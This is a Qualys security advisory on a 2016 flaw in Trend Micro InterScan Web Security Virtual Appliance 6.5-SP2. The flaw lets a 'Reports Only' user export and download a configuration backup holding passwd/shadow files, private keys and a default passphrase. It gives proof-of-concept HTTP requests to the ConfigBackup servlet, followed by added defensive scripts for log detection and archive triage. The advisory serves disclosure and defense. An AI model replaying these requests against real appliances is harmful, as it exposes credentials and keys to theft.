Qualys Security Advisory QSA-2016-11-02 


November 02, 2016 


Sensitive Information Disclosure Vulnerability in Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5.x


SYNOPSIS:


Trend Micro InterScan Web Security Virtual Appliance (IWSVA) suffers from a sensitive information disclosure vulnerability.


Reference: http://downloadcenter.trendmicro.com/?prodid=86&regs=NABU 


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target Hostname: TrendMicroIWSVA6.5SP2
2. Target IP Address: 192.168.253.150 
3. Kali Machine IP: 192.168.253.136 


Vulnerable/Tested Version: 


InterScan Web Security Virtual Appliance version 6.5-SP2_Build_Linux_1707. Older versions are also affected.
Patch Information (download listing dated 10/25/16):

IWSVA 6.5SP2 EN Patch 1 Build 1707          10/25/16 10:06:16 PM
IWSVA 6.5-SP2 Hot Fix Build 1622            10/25/16 9:59:53 PM
IWSVA 6.5-SP2 Critical Patch Build 1620     10/25/16 9:55:19 PM
IWSVA 6.5-SP2 Critical Patch Build 1608     10/25/16 9:44:12 PM


Note: All the vulnerabilities mentioned in this report were tested with a least privileged user account ‘test’. This user has the ‘Reports Only’ role assigned.
Vulnerability 1: Sensitive Information Disclosure Vulnerability


An authenticated remote user with the least privileged role (a user with the ‘Reports only’ role) can download a configuration backup file from the system.


Risk Factor: Medium 


Impact: 


An attacker with low privileges can abuse the ConfigBackup functionality to back up the system configuration and download it to a local machine. This backup file contains sensitive information such as the passwd/shadow files, RSA certificates, private keys and the default passphrase.


CVSS Score: AV:N/AC:L/Au:S/C:C/I:C/A:C
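Because the export and download both go through one servlet (the /servlet/com.trend.iwss.gui.servlet.ConfigBackup path shown in the proof-of-concept requests later in this advisory), a defender can watch the console's access log for any use of that servlet and tie it back to the session that issued it. The following script is an added example written for this advisory, not code from Qualys or Trend Micro. It assumes the console's Tomcat server (the response banner is Apache-Coyote/1.1) writes an Apache/Tomcat "common"-pattern access log (%h %l %u %t "%r" %s %b); the log lines embedded in it are constructed, not captured from a real appliance.

```python
"""Detect configuration-backup export/download requests in IWSVA console access logs.

Added example for this advisory; it is not Qualys' or Trend Micro's code.
Assumes an Apache/Tomcat "common"-pattern access log. SAMPLE_LOG is constructed.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Servlet path and the two actions used in the advisory's proof-of-concept.
CONFIG_BACKUP_PATH = "/servlet/com.trend.iwss.gui.servlet.ConfigBackup"
BACKUP_ACTIONS = {"export", "download"}

# %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one client runs the export/download sequence, another
# client only views the dashboard.
SAMPLE_LOG = """\
192.168.253.136 - - [02/Nov/2016:09:31:10 +0000] "POST /rest/commonlog/dashboard_query HTTP/1.1" 200 512
192.168.253.136 - - [02/Nov/2016:09:32:41 +0000] "POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=export HTTP/1.1" 302 -
192.168.253.136 - - [02/Nov/2016:09:32:42 +0000] "GET /config_backup_progress.jsp?op=export HTTP/1.1" 200 2048
192.168.253.136 - - [02/Nov/2016:09:33:03 +0000] "POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1" 200 2918400
10.0.0.5 - - [02/Nov/2016:09:40:00 +0000] "GET /log/page/dashboard.html HTTP/1.1" 200 9100
"""


def parse_line(line):
    """Return the fields of one common-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])  # "-" means no body
    return rec


def backup_action(target):
    """Return 'export' or 'download' if the request targets the ConfigBackup servlet, else None."""
    parts = urlsplit(target)
    if parts.path != CONFIG_BACKUP_PATH:
        return None
    action = parse_qs(parts.query).get("action", [""])[0]
    return action if action in BACKUP_ACTIONS else None


def find_backup_events(log_text):
    """Return every ConfigBackup export/download request found in the log text."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        action = backup_action(rec["target"])
        if action is None:
            continue
        events.append({"ip": rec["ip"], "ts": rec["ts"], "action": action,
                       "status": rec["status"], "size": rec["size"]})
    return events


def summarize_by_client(events):
    """Group events per client IP; a client that completed a download (200 with a body) is flagged."""
    summary = defaultdict(lambda: {"actions": [], "downloaded_bytes": 0, "archive_retrieved": False})
    for ev in events:
        rec = summary[ev["ip"]]
        rec["actions"].append(ev["action"])
        if ev["action"] == "download" and ev["status"] == 200 and ev["size"] > 0:
            rec["downloaded_bytes"] += ev["size"]
            rec["archive_retrieved"] = True
    return dict(summary)


if __name__ == "__main__":
    for ip, rec in summarize_by_client(find_backup_events(SAMPLE_LOG)).items():
        print(ip, rec)
```

The access log's %u field stays "-" for a form-based login, so the script can only attribute activity to a client address; the account behind it has to be resolved from the JSESSIONID in the application's own logs. On an unpatched appliance any ConfigBackup download from a session that is not an administrator's is the condition this advisory describes, and the byte count on the download (2918400 in the captured response) tells you whether the archive actually left the box.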


Proof-Of-Concept: 


1. Log into the IWSVA web console with the least privileged user ‘test’. Note down the ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session.


[Screenshot: Firefox developer tools, Network tab, on the IWSVA dashboard at http://192.168.253.150:1812/index.jsp (CSRFGuardToken carried in the query string), showing the XHR POST requests to dashboard_query issued by the page.]


POST http://192.168.253.150:1812/rest/commonlog/dashboard_query


Request Headers:

Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.253.150:1812/log/page/dashboard.html
3. Send the following POST request using Burp Suite Repeater with the ‘CSRFGuardToken’ and ‘JSESSIONID’ values obtained earlier. Follow redirections in Burp Suite to complete the request.


POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=export HTTP/1.1
Host: 192.168.253.150:1812
Cookie: JSESSIONID=E4FAA438E206F10153DBA5D9CB2BE0FC

CSRFGuardToken=J3AZMAA12AMJNBFOXAR2LVYKQSVQ1KZB&op=save&uploadfile=&beFullyOrPartially=0


[Screenshot: Burp Suite Repeater, target http://192.168.253.150:1812, with "Follow redirection" selected. The response redirects to http://192.168.253.150:1812/config_backup_progress.jsp?CSRFGuardToken=J3AZMAA12AMJNBFOXAR2LVYKQSVQ1KZB&op=export with Content-Length: 0.]
4. Send the following POST request using Burp Suite Repeater with the ‘CSRFGuardToken’ and ‘JSESSIONID’ values obtained earlier.


Request:

POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.253.150:1812/config_backup_result.jsp?op=export
Cookie: JSESSIONID=E4FAA438E206F10153DBA5D9CB2BE0FC
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 158

CSRFGuardToken=J3AZMAA12AMJNBFOXAR2LVYKQSVQ1KZB&op=2&ImEx_success=1&pkg_name=%2Fvar%2Fiwss%2Fmigration%2Fexport%2FIWSVA6.5-SP2_Config.tar%0D%0A&backup_return=


Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment; filename="IWSVA6.5-SP2_Config.tar"
Content-Type: APPLICATION/OCTET-STREAM
Content-Length: 2918400
Date: Wed, 02 Nov 2016 09:33:03 GMT
Connection: close

[Binary tar archive body. The entries visible in Burp's raw view begin with the "Configurations/" directory and "Configurations/cap_icon.png" (a PNG with embedded Adobe XMP metadata), followed by the remaining files under Configurations/.]




[Screenshot: Burp Suite "Show response in browser" dialog; the generated URL is opened in Firefox, which offers to open IWSVA6.5-SP2_Config.tar (tar Archive, 2.8 MB) from http://192.168.253.150:1812 with 7-Zip File Manager.]


6. This backup file discloses sensitive information such as the passwd and shadow files, RSA certificates and private keys along with the default passphrase.


[Screenshot 1: 7-Zip File Manager showing C:\Users\kkhot\Downloads\IWSVA6.5-SP2_Config(1).tar\Configurations\]

Name                                 Size      Packed Size  Modified          Mode         User   Group
(name not legible)                   223 482   272896       2016-10-28 12:13  0rwxr-xr-x   root   iscan
crl                                  594 830   608768       2016-10-28 12:13  0rwxr-xr-x   root   iscan
dip_template                         547 475   601600       2016-10-28 12:13  0rwxr-xr-x   root   iscan
https_ca                             6 462     8192         2016-10-28 12:13  0rwxr-xr-x   root   iscan
ifcfg                                431       1024         2016-10-28 12:13  0rwxr-xr-x   root   iscan
pac_files                            511       512          2016-10-28 12:13  0rwxr-xr-x   root   iscan
reverse_proxy                        0         0            2016-10-28 12:13  0rwxr-xr-x   root   iscan
url                                  3852      4096         2016-10-28 12:13  0rwxr-xr-x   root   iscan
.default.passphrase                  34        512          2016-10-28 12:13  0rw-r--r--   iscan  iscan
Agent.ini                            1552      2048         2016-10-28 12:13  0rwxr-xr-x   iscan  iscan
aucfg.ini                            236       512          2016-10-28 12:13  0rw-r-----   iscan  iscan
AuthACL_http.ini                     1195      1536         2016-10-28 12:13  0rw-r-----   iscan  iscan
captive_portal.cert                  1529      1536         2016-10-28 12:13  0rw-r-----   iscan  iscan
captive_portal.pkey                  1751      2048         2016-10-28 12:13  0rw-r-----   iscan  iscan
captive_portal_auth_template.htm     2276      2560         2016-10-28 12:13  0rw-r--r--   iscan  iscan
cap_icon.png                         26 754    27136        2016-10-28 12:13  0rw-r--r--   iscan  iscan
CDT_Config.ini                       9 230     9728         2016-10-28 12:13  0rw-r-----   iscan  iscan
ClientACL_ftp.ini                    979       1024         2016-10-28 12:13  0rw-r-----   iscan  iscan
ClientACL_http.ini                   1409      1536         2016-10-28 12:13  0rw-r-----   iscan  iscan
ClientConnectionQuotaWhiteList.ini   1447      1536         2016-10-28 12:13  0rw-r-----   iscan  iscan
clock                                20        512          2016-10-28 12:13  0rw-r--r--   root   root
Commonlog.ini                        2951      3072         2016-10-28 12:13  0rwxr-xr-x   iscan  iscan
crontab.iscan                        1738      2048         2016-10-28 12:13  0rw-r-----   iscan  iscan
crontab.root                         416       512          2016-10-28 12:13  0rw-r-----   iscan  iscan
Custom_Message                       2         512          2016-10-28 12:13  0rw-r-----   iscan  iscan
csredirect.tt                        254       512          2016-10-28 12:13  0rw-r-----   iscan  iscan
dcs_serverlist.ini                   0         0            2016-10-28 12:13  0rw-r-----   iscan  iscan
ddi_agent.ini                        182       512          2016-10-28 12:13  0rw-r--r--   iscan  iscan
(name not legible)                   1407      1536         2016-10-28 12:13  0rw-r--r--   iscan  iscan
(name not legible)                   1751      2048         2016-10-28 12:13  0rw-r--r--   iscan  iscan
diagnostic_tool.ini                  8 994     9216         2016-10-28 12:13  0rw-r--r--   iscan  iscan
dtas.ini                             583       1024         2016-10-28 12:13  0rw-r-----   iscan  iscan
exception_list.ini                   0         0            2016-10-28 12:13  0rw-r--r--   iscan  iscan
Except_list.ini                      20        512          2016-10-28 12:13  0rwxr-xr-x   iscan  iscan


[Screenshot 2: 7-Zip File Manager, the same Configurations\ directory further down the listing. Entries shown, all modified 2016-10-28 12:13 and owned by root or iscan, with modes rw-r--r--, rw-r----- or rwxr-xr-x: passwd, pas_adv.htm, pas_default.htm, pas_policy, pas_welcome, pg_hba.conf, pg_ident.conf, postgresql.conf, (name not legible), Product.ini, rb.lst, report_config.ini, resolv.conf, reverse_proxy_settings.ini, root, S55sshd, S99lanbypass, server.xml, ServerFarmMemberList_http.ini, ServerIPWhiteList_ftp.ini, ServerIPWhiteList_http.ini, shadow, snmp_conf.ini, safesearch_engine.xml.]
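When an incident responder has to judge what a retrieved IWSVA6.5-SP2_Config.tar exposed, the listing above is the input: which members are credential stores, which are keys, and which of them the archive hands over world-readable. The script below is an added example written for this advisory, not Qualys' or Trend Micro's code. It builds a small archive in memory whose member names, owners and modes mirror the advisory's 7-Zip listing (the file contents are constructed placeholders), and the category patterns it applies are this example's own assumptions about what matters for triage, derived from the advisory's impact statement.

```python
"""Triage an IWSVA configuration backup archive for the sensitive members the advisory names.

Added example for this advisory; not Qualys' or Trend Micro's code. The
sample archive is constructed in memory; the category patterns are assumptions.
"""
import fnmatch
import io
import tarfile

# Category -> glob patterns (assumed; derived from the advisory's impact statement and listing).
SENSITIVE_PATTERNS = {
    "credential-store": ["*/passwd", "*/shadow", "*/.default.passphrase"],
    "private-key": ["*.pkey"],
    "certificate": ["*.cert", "*/crl/*"],
    "db-auth-config": ["*/pg_hba.conf", "*/pg_ident.conf"],
    "service-config": ["*/server.xml", "*/snmp_conf.ini", "*/crontab.*"],
}


def classify(member_name):
    """Return the first matching category for an archive member path, or None."""
    for category, patterns in SENSITIVE_PATTERNS.items():
        if any(fnmatch.fnmatchcase(member_name, p) for p in patterns):
            return category
    return None


def _add_member(tar, name, content, mode, uname="iscan", gname="iscan"):
    """Append one regular file with the given POSIX mode and owner to an open tar."""
    data = content.encode()
    info = tarfile.TarInfo(name)
    info.size = len(data)
    info.mode = mode
    info.uname = uname
    info.gname = gname
    tar.addfile(info, io.BytesIO(data))


def build_sample_archive():
    """Construct an archive shaped like IWSVA6.5-SP2_Config.tar; every content is a placeholder."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        top = tarfile.TarInfo("Configurations/")
        top.type = tarfile.DIRTYPE
        top.mode = 0o755
        tar.addfile(top)
        _add_member(tar, "Configurations/passwd", "root:x:0:0:root:/root:/bin/bash\n", 0o644, "root", "root")
        _add_member(tar, "Configurations/shadow", "root:PLACEHOLDER_HASH:17100:0:99999:7:::\n", 0o640, "root", "root")
        # Mode and owner as in the advisory's listing: rw-r--r-- iscan iscan.
        _add_member(tar, "Configurations/.default.passphrase", "placeholder-passphrase\n", 0o644)
        _add_member(tar, "Configurations/captive_portal.pkey",
                    "-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER\n-----END RSA PRIVATE KEY-----\n", 0o640)
        _add_member(tar, "Configurations/captive_portal.cert",
                    "-----BEGIN CERTIFICATE-----\nPLACEHOLDER\n-----END CERTIFICATE-----\n", 0o640)
        _add_member(tar, "Configurations/pg_hba.conf", "local all all md5\n", 0o640)
        _add_member(tar, "Configurations/cap_icon.png", "PNG placeholder", 0o644)
        _add_member(tar, "Configurations/Product.ini", "[Product]\nVersion=6.5-SP2\n", 0o640)
    return buf.getvalue()


def triage_archive(tar_bytes):
    """Walk the archive; report sensitive members by category and those readable by any local user."""
    findings = {"by_category": {}, "world_readable": [], "unclassified": 0}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            category = classify(member.name)
            if category is None:
                findings["unclassified"] += 1
                continue
            findings["by_category"].setdefault(category, []).append(member.name)
            if member.mode & 0o004:  # "other" read bit set on a sensitive member
                findings["world_readable"].append(member.name)
    return findings


if __name__ == "__main__":
    result = triage_archive(build_sample_archive())
    for category, names in result["by_category"].items():
        print(category, names)
    print("world-readable:", result["world_readable"])
    print("unclassified members:", result["unclassified"])
```

Run against a real archive by replacing build_sample_archive() with the bytes of the downloaded tar. The world-readable check matters because the listing shows .default.passphrase extracted as rw-r--r--: once the archive is unpacked on an analyst's or attacker's machine, that file is readable by every local account, so the passphrase should be treated as disclosed and the affected credentials, certificates and keys rotated after patching.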


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys Vulnerability Signature/Research Team.


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at http://www.qualys.com or send email to research @ qualys.com


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2016 Qualys Inc. It may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way.


